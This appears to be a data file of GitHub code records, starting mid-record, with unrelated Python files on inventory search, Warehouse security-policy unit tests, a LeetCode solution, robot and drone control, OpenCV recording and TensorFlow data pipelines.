brango(rango_i: int, rango_f: int):\r\n    lista = []\r\n    # rango_i is the initial price and rango_f the final price, marking the price range\r\n    with open(inventario_path) as inventario:\r\n        with open(results_path, 'w') as result:\r\n            for linea in inventario:  # for every line in the inventory file\r\n                datos = linea.split(\",\")  # split each line's data\r\n                if int(datos[2]) >= rango_i and int(datos[2]) <= rango_f:  # if the price falls within [rango_i, rango_f]\r\n                    result.write(f\"{datos[0]}: ${datos[2]}\\n\")\r\n                    print(f\"{datos[0]}: ${datos[2]}\")  # show the product and its price\r\n                    lista.append(datos[0])  # collect the product name in the list\r\n\r\n    print(\"\\nHay un total de\", len(lista), \"productos con ese rango de precio\")\r\n\r\n\r\n# Function that returns the available stock\r\ndef bstock(producto):\r\n    # open the flat file where the products are stored\r\n    with open(inventario_path) as inventario:\r\n        for linea in inventario:  # for every line in the flat file\r\n            datos = linea.split(\",\")  # split the fields of each line\r\n            if producto in datos[0] or producto in datos[1]:  # if the product name or code is in this line\r\n                return int(datos[3])  # return how many units are in stock\r\n\r\n\r\n# Function that returns a product's price\r\ndef bprecio(producto):\r\n    # open the flat file where the products are stored\r\n    with open(inventario_path) as inventario:\r\n        for linea in inventario:  # for every line in the flat file\r\n            datos = linea.split(\",\")  # split the fields of each line\r\n            if producto in datos[0] or producto in datos[1]:  # if the product name or code is in this line\r\n                return int(datos[2])  # return what the product costs\r\n\r\n\r\n# Function to search by product code or product name\r\ndef bproducto(producto):\r\n    encontrado = 0\r\n    # open the flat file where the products are stored\r\n    with open(inventario_path) as inventario:\r\n        for linea in inventario:  # for every line in the flat file\r\n            datos = linea.split(\",\")  # split each line's data into a list\r\n\r\n            if producto == datos[1] or producto == datos[0]:  # if the product code or name matches this line\r\n                
encontrado = 1\r\n                return datos[0]\r\n\r\n    if encontrado == 0:\r\n        # return \"Producto no encontrado\"\r\n        return False\r\n\r\n\r\n# Function to show every available product\r\ndef mostrarProductos():\r\n    with open(inventario_path) as inventario:\r\n        for linea in inventario:\r\n            producto = linea.split(\",\")\r\n            print(producto[0])\r\n\r\n\r\n# Show the out-of-stock items, the ones with stock 0\r\ndef agotados():\r\n    system('cls')\r\n    print(\"Productos agotados: \")\r\n    with open(inventario_path) as inventario:\r\n        for linea in inventario:\r\n            producto = linea.split(\",\")\r\n            if producto[3] == \"0\\n\":\r\n                print(producto[0])\r\n\r\n\r\n# Show the available items, stock greater than 0\r\ndef disponibles():\r\n    system('cls')\r\n    print(\"Productos disponibles: \")\r\n    with open(inventario_path) as products_file:\r\n        for linea in products_file:\r\n            producto = linea.split(\",\")\r\n            if producto[3] != \"0\\n\":\r\n                print(producto[0])\r\n\r\n    input(\"\\nPresiona Enter para seguir\")\r\n","repo_name":"liangbinjie/pyme-fotografia","sub_path":"buscador.py","file_name":"buscador.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43805445450","text":"import json\nimport os\nimport shutil\n\ndirectoryToSave = 'extracted'\ndirectoryToSearch = 'resized_rsync'\ndirectoryMetadata = 'metadata'\n\ndef writefile(filename, text):\n    f = open(filename, \"w\")\n    f.write(text)\n    print('Saved the following: ' + text)\n    f.close()\n\nnumero = -1\nfor i in range(12):\n    numero = numero + 1\n    str_numero = str(numero)\n    zfilled = str_numero.zfill(2)\n    json_file_name = \"metadata/posts0000000000\" + zfilled + \".json\"\n    print(json_file_name)\n    ","repo_name":"Kingkobe150/stable-diffusion-scripts","sub_path":"scripts/optimized_extractor.py","file_name":"optimized_extractor.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43023712694","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pretend\n\nfrom pyramid.interfaces import ISecurityPolicy\nfrom zope.interface.verify import verifyClass\n\nfrom warehouse.utils import security_policy\n\n\ndef test_principals_for():\n    identity = pretend.stub(__principals__=lambda: [\"a\", \"b\", \"z\"])\n    assert security_policy.principals_for(identity) == [\"a\", \"b\", \"z\"]\n\n\ndef test_principals_for_with_none():\n    assert security_policy.principals_for(pretend.stub()) == []\n\n\nclass TestMultiSecurityPolicy:\n    def test_verify(self):\n        assert verifyClass(\n            ISecurityPolicy,\n            security_policy.MultiSecurityPolicy,\n        )\n\n    def test_reset(self):\n        identity1 = pretend.stub()\n        identity2 = pretend.stub()\n        identities = iter([identity1, identity2])\n\n        subpolicies = [pretend.stub(identity=lambda r: next(identities))]\n        policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n        request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n\n        
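# identity() is resolved by the first matching subpolicy and cached on the request until reset()\n        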
assert policy.identity(request) is identity1\n assert policy.identity(request) is identity1\n\n policy.reset(request)\n\n assert policy.identity(request) is identity2\n\n def test_identity_none(self):\n subpolicies = [pretend.stub(identity=lambda r: None)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n assert policy.identity(request) is None\n\n def test_identity_first_come_first_serve(self):\n identity1 = pretend.stub()\n identity2 = pretend.stub()\n subpolicies = [\n pretend.stub(identity=lambda r: None),\n pretend.stub(identity=lambda r: identity1),\n pretend.stub(identity=lambda r: identity2),\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n assert policy.identity(request) is identity1\n\n def test_authenticated_userid_no_identity(self):\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n subpolicies = [pretend.stub(identity=lambda r: None)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n assert policy.authenticated_userid(request) is None\n\n def test_authenticated_userid_nonuser_identity(self, db_request):\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n nonuser = pretend.stub(id=\"not-a-user-instance\")\n subpolicies = [pretend.stub(identity=lambda r: nonuser)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n assert policy.authenticated_userid(request) is None\n\n def test_authenticated_userid(self, monkeypatch):\n monkeypatch.setattr(security_policy, \"User\", pretend.stub)\n\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n user = pretend.stub(id=\"a fake user\")\n subpolicies = [pretend.stub(identity=lambda r: user)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n assert policy.authenticated_userid(request) == str(user.id)\n\n def test_forget(self):\n subpolicies = [pretend.stub(forget=lambda r, **kw: [(\"ForgetMe\", \"1\")])]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub()\n assert policy.forget(request, foo=None) == [(\"ForgetMe\", \"1\")]\n\n def test_remember(self):\n subpolicies = [\n pretend.stub(remember=lambda r, uid, foo, **kw: [(\"RememberMe\", foo)])\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub()\n userid = pretend.stub()\n assert policy.remember(request, userid, foo=\"bob\") == [(\"RememberMe\", \"bob\")]\n\n def test_permits(self):\n identity1 = pretend.stub()\n identity2 = pretend.stub()\n context = pretend.stub()\n\n subpolicies = [\n pretend.stub(identity=lambda r: None),\n pretend.stub(\n identity=lambda r: identity1,\n permits=(\n lambda r, c, p: r.identity == identity1\n and c == context\n and p == \"myperm\"\n ),\n ),\n pretend.stub(identity=lambda r: identity2),\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub(\n identity=identity1,\n add_finished_callback=lambda *a, **kw: None,\n )\n\n assert policy.permits(request, context, \"myperm\")\n\n def test_permits_no_policy(self):\n subpolicies = [\n pretend.stub(identity=lambda r: None),\n pretend.stub(identity=lambda r: None),\n pretend.stub(identity=lambda r: None),\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n request = pretend.stub(\n identity=None, add_finished_callback=lambda *a, **kw: None\n )\n context = pretend.stub()\n\n assert not policy.permits(request, context, 
\"myperm\")\n","repo_name":"pypi/warehouse","sub_path":"tests/unit/utils/test_security_policy.py","file_name":"test_security_policy.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"7495553836","text":"from typing import List\n\n\nclass Solution:\n def maxPoints(self, points: List[List[int]]) -> int:\n max_count = 0\n\n def find_slope(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n\n if y1 - y2 == 0:\n slope = 0\n else:\n slope = \"undefined\" if x1 - x2 == 0 else (x1 - x2) / (y1 - y2)\n\n return slope\n\n for i in range(len(points)):\n slope_count = {}\n\n for j in range(i + 1, len(points)):\n point1 = points[i]\n point2 = points[j]\n slope = find_slope(point1, point2)\n\n slope_count[slope] = slope_count.get(slope, 0) + 1\n max_count = max(max_count, slope_count[slope])\n\n return max_count + 1\n\n\"\"\"\nExplanation:\n\nIterate through each point and compare it with all other points to calculate the slopes of the lines formed by pairs of points. Use a dictionary slope_count to keep track of the count of each slope encountered. The max count is updated whenever a new slope count exceeds the current maximum. The helper function find_slope calculates the slope between two points (x1, y1) and (x2, y2). It handles special cases where the y-coordinates are equal (horizontal line) or the x-coordinates are equal (vertical line), and returns the slope value accordingly.\n\nFinally, return the max count once we're done iterating through all points.\n\nNotes:\n\nTime complexity: O(n^2), as the nested loop iterates through each pair of points for each point\n\nSpace complexity: O(n) to store the slope counts\n\"\"\"\n\n# Test Case 1: Normal case w/ 3 points\npoints = [[1, 1], [2, 2], [3, 3]]\nresult = Solution().maxPoints(points)\nexpected = 3\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 2: All points are on the same line\npoints = [[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]]\nresult = Solution().maxPoints(points)\nexpected = 5\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 3: Points form a triangle\npoints = [[1, 1], [2, 2], [3, 3], [1, 3], [2, 1]]\nresult = Solution().maxPoints(points)\nexpected = 3\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 4: Points form a vertical line\npoints = [[1, 1], [1, 2], [1, 3], [1, 4], [1, 5]]\nresult = Solution().maxPoints(points)\nexpected = 5\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 5: Points form a horizontal line\npoints = [[1, 1], [2, 1], [3, 1], [4, 1], [5, 1]]\nresult = Solution().maxPoints(points)\nexpected = 5\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 6: Single point\npoints = [[1, 1]]\nresult = Solution().maxPoints(points)\nexpected = 1\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 7: Single slope between points\npoints = [[1, 0], [2, 3], [3, 5]]\nresult = Solution().maxPoints(points)\nexpected = 2\nassert result == expected, f\"Expected {expected} but got {result}\"","repo_name":"garofalof/algopractice_python","sub_path":"hard/149_Max_Points_on_a_Line.py","file_name":"149_Max_Points_on_a_Line.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35268918745","text":"#! 
/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n'''\r\n\tmade by Ian in 2017-8-4 17:16:46\r\n\tLocomotion control Tutorial: The Robot Position\r\n\thttp://doc.aldebaran.com/2-1/naoqi/motion/control-walk-tuto2.html\r\n'''\r\n\r\nimport time\r\nfrom naoqi import ALProxy\r\nrobot_ip = \"192.168.1.102\" # NAO's IP address. Note: make sure the host and the NAO are on the same LAN\r\nrobot_port = 9559 # default port : 9559\r\nmotionProxy = ALProxy(\"ALMotion\", robot_ip, robot_port)\r\npostureProxy = ALProxy(\"ALRobotPosture\", robot_ip, robot_port)\r\n\r\n#aup.playFileFromPosition(\"F:\\\\CloudMusic\\\\Alvaro Soler - Volar.mp3\")\r\n#at.ALMotionProxy(0.1)\r\nmotionProxy.wakeUp() # wake up the robot\r\nmotionProxy.moveInit() # initialize the walk\r\nmotionProxy.moveTo(0,0,5) # move target (forward/backward, left/right, turn angle)\r\n\r\n# Send robot to Stand Init\r\npostureProxy.goToPosture(\"StandInit\", 0.5)\r\n# Initialize the move\r\nmotionProxy.moveInit()\r\n'''\r\n# end init, begin experiment\r\n\r\n# First call of move API\r\n# with post prefix to not be blocking here.\r\nmotionProxy.post.moveTo(0.3, 0.0, 0.5)\r\n\r\n# wait that the move process start running\r\ntime.sleep(0.1)\r\n\r\n# get robotPosition and nextRobotPosition\r\nuseSensors = False\r\nrobotPosition = almath.Pose2D(motionProxy.getRobotPosition(useSensors))\r\nnextRobotPosition = almath.Pose2D(motionProxy.getNextRobotPosition())\r\n'''\r\nmotionProxy.rest() # put the robot back to rest\r\n\r\n","repo_name":"Yeah-Kun/python","sub_path":"NAO/Tutorial/LearnMotion.py","file_name":"LearnMotion.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"3"} +{"seq_id":"36732660805","text":"import KeyClipWriter\r\nfrom imutils.video import VideoStream\r\nimport argparse\r\nimport datetime\r\nimport imutils\r\nimport time\r\nimport cv2\r\n\r\n# construct the argument parser and parse the arguments\r\nap=argparse.ArgumentParser()\r\nap.add_argument(\"-o\",\"--output\",required=True,\r\n    help=\"path to output directory\") # path to the output directory\r\nap.add_argument(\"-p\",\"--picamera\",type=int,default=-1, # whether or not the Raspberry Pi camera should be used\r\n    help=\"whether or not the Raspberry Pi camera should be used\")\r\nap.add_argument(\"-f\",\"--fps\",type=int,default=20,\r\n    help=\"FPS of output video\") # FPS of the output video\r\nap.add_argument(\"-c\",\"--codec\",type=str,default=\"MJPG\",\r\n    help=\"codec of output video\") # codec of the output video\r\nap.add_argument(\"-b\",\"--buffer-size\",type=int,default=32,\r\n    help=\"buffer size of video clip writer\") # buffer size of the clip writer\r\nargs=vars(ap.parse_args())\r\n\r\n# initialize the video stream and allow the camera sensor to \"warm up\"\r\nprint(\"[INFO] warming up camera...\")\r\nvs=VideoStream(usePiCamera=args[\"picamera\"]>0).start()\r\ntime.sleep(2.0)\r\n\r\n# define the lower and upper boundaries of the \"green\" ball in the HSV color space\r\ngreenLower=(29,86,6)\r\ngreenUpper=(64,255,255)\r\n# initialize the key clip writer and the consecutive-frame counter\r\nkcw=KeyClipWriter.KeyClipWriter(bufSize=args[\"buffer_size\"])\r\nconsecFrames=0\r\n\r\n# keep looping\r\nwhile True:\r\n    '''\r\n    grab the current frame, resize it, and initialize a boolean indicating whether the consecutive-frames counter should be updated\r\n    '''\r\n    frame=vs.read()\r\n    frame=imutils.resize(frame,width=600)\r\n    updateConsecFrames=True\r\n    # blur the frame and convert it to the HSV color space\r\n    blurred=cv2.GaussianBlur(frame,(11,11),0)\r\n    hsv=cv2.cvtColor(blurred,cv2.COLOR_BGR2HSV)\r\n    # construct a mask for the color \"green\", then perform a series of dilations and erosions to remove small blobs left in the mask\r\n    mask=cv2.inRange(hsv,greenLower,greenUpper)\r\n    mask=cv2.erode(mask,None,iterations=2)\r\n    mask=cv2.dilate(mask,None,iterations=2)\r\n    # find contours in the mask\r\n    cnts=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n    cnts=imutils.grab_contours(cnts)\r\n\r\n    # only proceed if at least one contour was found\r\n    if len(cnts) > 0:\r\n        # find the largest contour in the mask, then use it to compute the minimum enclosing circle\r\n        c = max(cnts, key=cv2.contourArea)\r\n        ((x, y), radius) = cv2.minEnclosingCircle(c)\r\n        
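# --- Editor's illustrative sketch (the real KeyClipWriter module is not shown
# in this file). The key-clip idea: keep the last N frames in a ring buffer so
# that, when an event fires, the saved clip also contains the frames *before*
# the event. A minimal standalone version under that assumption:
from collections import deque

class MiniClipBuffer:
    def __init__(self, buf_size=32):
        self.frames = deque(maxlen=buf_size)  # oldest frames fall off the end
        self.recording = False

    def update(self, frame):
        self.frames.appendleft(frame)  # always buffer, recording or not

    def start(self):
        self.recording = True  # a real writer would also open a VideoWriter

    def finish(self):
        self.recording = False  # ...and flush self.frames to disk here
# ------------------------------------------------------------------------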
updateConsecFrames = radius <= 10\r\n        # only proceed if the radius meets a minimum size\r\n        if radius > 10:\r\n            consecFrames = 0\r\n            cv2.circle(frame, (int(x), int(y)), int(radius),\r\n                (0, 0, 255), 2)\r\n            # if we are not already recording, start recording\r\n            if not kcw.recording:\r\n                timestamp = datetime.datetime.now()\r\n                p = \"{}/{}.avi\".format(args[\"output\"],\r\n                    timestamp.strftime(\"%Y%m%d-%H%M%S\"))\r\n                kcw.start(p, cv2.VideoWriter_fourcc(*args[\"codec\"]),\r\n                    args[\"fps\"])\r\n    # otherwise, no action took place in this frame, so increment the count of consecutive frames containing no action\r\n    if updateConsecFrames:\r\n        consecFrames += 1\r\n    # update the key frame clip buffer\r\n    kcw.update(frame)\r\n    # if we are recording and the number of consecutive no-action frames reaches the threshold, stop recording the clip\r\n    if kcw.recording and consecFrames == args[\"buffer_size\"]:\r\n        kcw.finish()\r\n    # show the frame\r\n    cv2.imshow(\"Frame\", frame)\r\n    key = cv2.waitKey(1) & 0xFF\r\n    # if the q key was pressed, break from the loop\r\n    if key == ord(\"q\"):\r\n        break\r\n\r\n# if we are still recording a clip, wrap it up\r\nif kcw.recording:\r\n    kcw.finish()\r\n# cleanup\r\ncv2.destroyAllWindows()\r\nvs.stop()","repo_name":"pan8090/OpenCV","sub_path":"save_key_events.py","file_name":"save_key_events.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26404163705","text":"from model import Subject, SubjectType, Grade, User\nfrom student import _has_student_full_permission_r, _has_student_full_permission_rw\nfrom user import _verify_token\n\ndef student_grade_add_update(token, student_uid, grade_list):\n    uid = _verify_token(token)\n    user = User.get_by_id(uid)\n    if not _has_student_full_permission_rw(user, student_uid):\n        raise ValueError(\"permission denied\")\n\n    for item in grade_list:\n        subject_id = Subject.get_or_none(Subject.name == item.subject_name)\n        if not subject_id:\n            subject_id = Subject.create(type=item.subject_type, name=item.subject_name, credit=item.subject_credit).subject_id\n\n        grade = Grade.get_or_none(Grade.uid == student_uid, Grade.subject_id == subject_id)\n        if grade:\n            grade.score = item.score\n            grade.save()\n        else:\n            Grade.create(uid=student_uid, subject_id=subject_id, score=item.score)\n\n    return {\"status\": \"ok\"}\n\n\ndef student_grade_list(token, student_uid):\n    uid = _verify_token(token)\n    user = User.get_by_id(uid)\n    if not _has_student_full_permission_r(user, student_uid):\n        raise ValueError(\"permission denied\")\n\n    query = Grade.select().where(Grade.uid == student_uid)\n    data = [{\n        \"subject_name\": x.subject_id.name,\n        \"type\": x.subject_id.type,\n        \"credit\": x.subject_id.credit,\n        \"score\": x.score\n    } for x in query]\n    return {\"status\": \"ok\", \"grade_list\": data}\n","repo_name":"BJUT-FGH/CAHCPS-Backend","sub_path":"grade.py","file_name":"grade.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"9294082545","text":"import pandas as pd\nfrom utility import extract_data\n\n'''\n1. For IMDB, Wiki images - extract DOB, date the photo was taken, face scores 1 & 2, \n   gender, filepath\n2. Compile IMDB-Wiki dataset\n3. 
Clean noisy face_score1 and date values\n'''\n\nproject_dir='/Users/bhoomithakkar/PycharmProjects/chicago_trial/'\nsource_dir=project_dir\ndestination_dir=project_dir+'data/'\n\n# Extraction from Wiki meta-data\ndf1=extract_data.extract_data_fields('wiki', source_dir, destination_dir)\n# Extraction from IMDB meta-data\ndf2=extract_data.extract_data_fields('imdb', source_dir, destination_dir)\n\n# Concatenate wiki-imdb data\ndf=pd.concat([df1, df2]) # 523051\n\n# Visualising the basic summary of the data\nnull=df.isna().sum() # 305158 nans for score 2\ndescription=df.describe().transpose()\n\ndf['male']=df['gender'].apply(lambda x: 1 if x=='male' else 0)\ndf['female']=1-df['male']\n\ndf['face_score1']=df['face_score1'].astype('str')\ndf['face_score2']=df['face_score2'].astype('str')\n\n# Eliminate noisy score values\ndf_score1=df[df['face_score1'] != '-inf'] # 442,733\n\n# Eliminate noisy age values\ndf_age=df_score1[(df_score1['age'] >= 0) & (df_score1['age'] <= 100)] # 442322\ndf_age=df_age.reset_index()\ndf_age.drop(['index'], axis=1, inplace=True)\n\n# Checking basic description for data\ndescription_age=df_age.describe().transpose()\n\ndf_age.to_csv(destination_dir+'compiled_data_score1.csv',index=False)","repo_name":"BhoomiThakkar/imdb-wiki-assignment","sub_path":"code/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8146089912","text":"\nlist1 =[]\nprint('enter how many elements do you want to add to list:')\nfor i in range(0,int(input())):\n list1.append(input())\n\nprint('how many mid elements you want:')\nk = int(input())\n\nstartindex= (len(list1)//2)-(k//2)\nendindex = (len(list1)//2)+(k//2)\n\nresult =[]\n\nfor j in range(len(list1)):\n if j>=startindex and j1.0-1e-4,tf.ones_like(train_x),tf.zeros_like(train_x))\n\n #for camera\n train_c=tf.identity(train_x)\n train_c=tf.image.random_brightness(image=train_c, max_delta=self.max_off_brightness, seed=None)\n train_c=tf.clip_by_value(train_c,0,1)\n train_c=tf.where(zoom_x_mask>1.0-1e-4, tf.ones_like(train_c),train_c)\n \n #for others \n train_x = random_brightness(train_x, self.max_off_brightness)\n train_x = invert_color(train_x)\n train_x=tf.where(zoom_x_mask>1.0-1e-4, tf.ones_like(train_x),train_x)\n \n train_x=self._set_for_camera(train_x, train_c, obj_id)\n return (train_x, train_y, depth_y, obj_id, hsh_code)\n \n \n\n def _float_cast(self, train_x,train_y,depth_y,obj_id,hsh_code):\n train_x = tf.image.convert_image_dtype(train_x,tf.float32)\n train_y = tf.image.convert_image_dtype(train_y,tf.float32)\n return train_x,train_y,depth_y, obj_id,hsh_code\n\n def _set_for_camera(self, train_o, train_c, obj_id):\n with tf.variable_scope('set_encoder_inputs'):\n train_o = tf.cond(tf.logical_and(tf.greater_equal(obj_id,tf.constant(399,dtype=tf.int64)),tf.less(obj_id,tf.constant(473,dtype=tf.int64))), \n lambda:tf.identity(train_c), lambda:tf.identity(train_o))\n\n train_o = tf.cond(tf.logical_and(tf.greater_equal(obj_id,tf.constant(399+1085,dtype=tf.int64)),tf.less(obj_id,tf.constant(473+1085,dtype=tf.int64))), \n lambda:tf.identity(train_c), lambda:tf.identity(train_o))\n return train_o\n \n\n def _normalize_trainx_trainy(self, train_x, train_y, depth_y, obj_id, hsh_code):\n with tf.variable_scope('normalize_imgs'):\n _normalized_bgr_x= tf.image.per_image_standardization(train_x)\n _normalized_bgr_y= tf.image.per_image_standardization(train_y)\n\n 
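# --- Editor's note (illustrative, not part of the original pipeline) ---
# The normalization below rescales each z-scored image back into [0, 1]:
# first per-image standardization, then min-max. The same math in plain
# NumPy (all names here are hypothetical example values):
import numpy as np
_img = np.random.rand(4, 4).astype(np.float32)     # hypothetical example image
_z = (_img - _img.mean()) / max(_img.std(), 1e-6)  # z-score per image
_out = (_z - _z.min()) / (_z.max() - _z.min())     # min-max rescale to [0, 1]
assert 0.0 <= _out.min() and _out.max() <= 1.0
# -----------------------------------------------------------------------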
min_normalized_bgrx=tf.reduce_min(_normalized_bgr_x)\n            max_normalized_bgrx=tf.reduce_max(_normalized_bgr_x)\n\n            min_normalized_bgry=tf.reduce_min(_normalized_bgr_y)\n            max_normalized_bgry=tf.reduce_max(_normalized_bgr_y)\n\n            train_x=(_normalized_bgr_x-min_normalized_bgrx)/(max_normalized_bgrx-min_normalized_bgrx)\n            train_y=(_normalized_bgr_y-min_normalized_bgry)/(max_normalized_bgry-min_normalized_bgry)\n\n            train_x = tf.where(tf.is_nan(train_x), tf.zeros_like(train_x), train_x)\n            train_y = tf.where(tf.is_nan(train_y), tf.zeros_like(train_y), train_y)\n        \n        return train_x, train_y, depth_y, obj_id, hsh_code\n\n    def preprocess_pipeline(self, dataset):\n        dataset = dataset.map(self.deserialize_tfrecord) \n        dataset = dataset.shuffle(buffer_size=1000)\n        \n        dataset = dataset.map(lambda train_x,train_y,depth_y,obj_id,hsh_code :\n                            self._float_cast(train_x,train_y,depth_y,obj_id,hsh_code))\n        dataset = dataset.repeat()\n        dataset = dataset.map(lambda train_x,train_y,depth_y,obj_id,hsh_code :\n                            self._tf_augmentations(train_x,train_y,depth_y,obj_id,hsh_code))\n\n        dataset = dataset.map(lambda train_x,train_y,depth_y,obj_id,hsh_code:\n                            self._normalize_trainx_trainy(train_x,train_y,depth_y,obj_id,hsh_code))\n        dataset = dataset.batch(self.batch_size)\n        dataset = dataset.prefetch(1)\n        return dataset\n\n    def create_iterator(self, path_tf_records):\n        tf_dataset = tf.data.TFRecordDataset(path_tf_records, compression_type = 'ZLIB')\n        tf_dataset = self.preprocess_pipeline(tf_dataset)\n\n        iterator = tf_dataset.make_initializable_iterator()\n        self.next_element = iterator.get_next()\n        return iterator\n\n\n","repo_name":"fylwen/DISP-6D","sub_path":"datasets/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"} +{"seq_id":"40652480309","text":"import numpy as np\nimport time\nimport rospy\nfrom geometry_msgs.msg import PoseStamped, Point\nfrom std_msgs.msg import Bool, Float64, Int64MultiArray, Float64MultiArray\nfrom mavros_msgs.msg import State\nfrom threading import Thread\n\n\nclass UAV(Thread):\n\t\"\"\"\n\tUAV - class for calculating mission time and fuel resource.\n\n\tInitialization attributes:\n\t\t- uav_type:\t\t\t\t(string: \"ralx6\" or \"orlan\")\n\t\t- uav_name: \t\t\t(string: \"scoutX\" or \"bomberX\", X - uav_num)\n\t\t- uav_num:\t\t\t\t(int: number of UAV)\n\t\t- uav_position:\t\t\tactive UAV position\n\t\t- takeoff_point:\t\tUAV's take-off point\n\t\t- grouping_point:\t\tUAV's grouping point\n\t\t- drop_point:\t\t\tpoint for cargo drop\n\t\t- landing_point:\t\tpoint for UAV landing\n\t\t- armed:\t\t\t\tUAV's state (True - alive, False - lost)\n\t\t- fuel_resource:\t\tavailable fuel resource (in hours)\n\t\t- fuel_consume:\t\t\tfuel consumption (per hour)\n\t\t- cargo:\t\t\t\tpresence of cargo on the UAV (True/False)\n\t\t\n\t\"\"\"\n\tdef __init__(self, uav_type, uav_name, uav_num):\n\t\tThread.__init__(self)\n\t\tself.uav_type = uav_type\n\t\tself.uav_name = uav_name\n\t\tself.uav_num = uav_num\n\n\t\tself.uav_position = Point()\n\t\tself.takeoff_point = Point()\n\t\tself.grouping_point = Point()\n\t\tself.drop_point = Point()\n\t\tself.landing_point = Point()\n\n\t\tself.armed = bool\n\t\tself.fuel_resource = None\n\t\tself.fuel_consume = None\n\t\tself.cargo = None\n\n\t\tself.max_fuel_resource = 0.8333 if uav_type==\"ralx6\" else 16 # hours\n\t\tself.max_velocity = 60.0 if uav_type==\"ralx6\" else 150 # km/h\n\n\t\tself.time_bound = 10.0\n\n\t\tself.fuel_resource_subscribe = 
Float64()\n\t\tself.fuel_consume_subscribe = Float64()\n\n\t\tself.topic_uav_position = self.uav_name + str(self.uav_num) + \"/mavros/local_position/pose\"\n\t\tself.topic_armed = self.uav_name + str(self.uav_num) + \"/mavros/state\"\n\t\t#self.topic_takeoff_point = uav_name + str(uav_num) + \"/takeoff_point\"\n\t\tself.topic_takeoff_point = \"scout0/takeoff_point\"\n\t\t#self.topic_grouping_point = uav_name + str(uav_num) + \"/grouping_point\"\n\t\tself.topic_grouping_point = \"scout0/grouping_point\"\n\t\t#self.topic_drop_point = uav_name + str(uav_num) + \"/drop_point\"\n\t\tself.topic_drop_point = \"scout0/drop_point\"\n\t\t#self.topic_landing_point = uav_name + str(uav_num) + \"/landing_point\"\n\t\tself.topic_landing_point = \"scout0/landing_point\"\n\t\tself.topic_cargo = self.uav_name + str(self.uav_num) + \"/cargo\"\n\t\tself.topic_fuel_resource = self.uav_name + str(self.uav_num) + \"/fuel_resource\"\n\t\tself.topic_fuel_consume = self.uav_name + str(self.uav_num) + \"/fuel_consume\"\n\t\trospy.Subscriber(self.topic_uav_position, PoseStamped, self.uav_position_callback)\n\t\trospy.Subscriber(self.topic_armed, State, self.armed_callback)\n\t\trospy.Subscriber(self.topic_takeoff_point, Point, self.takeoff_point_callback)\n\t\trospy.Subscriber(self.topic_grouping_point, Point, self.grouping_point_callback)\n\t\trospy.Subscriber(self.topic_drop_point, Point, self.drop_point_callback)\n\t\trospy.Subscriber(self.topic_landing_point, Point, self.landing_point_callback)\n\t\trospy.Subscriber(self.topic_cargo, Bool, self.cargo_callback)\n\t\trospy.loginfo(\"Wait for fuel_resource of \" + self.uav_name)\n\t\tself.fuel_resource_subscribe = rospy.wait_for_message(self.topic_fuel_resource, Float64)\n\t\trospy.loginfo(\"Done waiting for fuel_resource of \" + self.uav_name)\n\t\t#rospy.Subscriber(self.topic_fuel_resource, Float64, self.fuel_resource_callback)\n\t\trospy.loginfo(\"Wait for fuel_consume of \" + self.uav_name)\n\t\tself.fuel_consume_subscribe = rospy.wait_for_message(self.topic_fuel_consume, Float64)\n\t\trospy.loginfo(\"Done waiting for fuel_consume of \" + self.uav_name)\n\t\t#rospy.Subscriber(self.topic_fuel_consume, 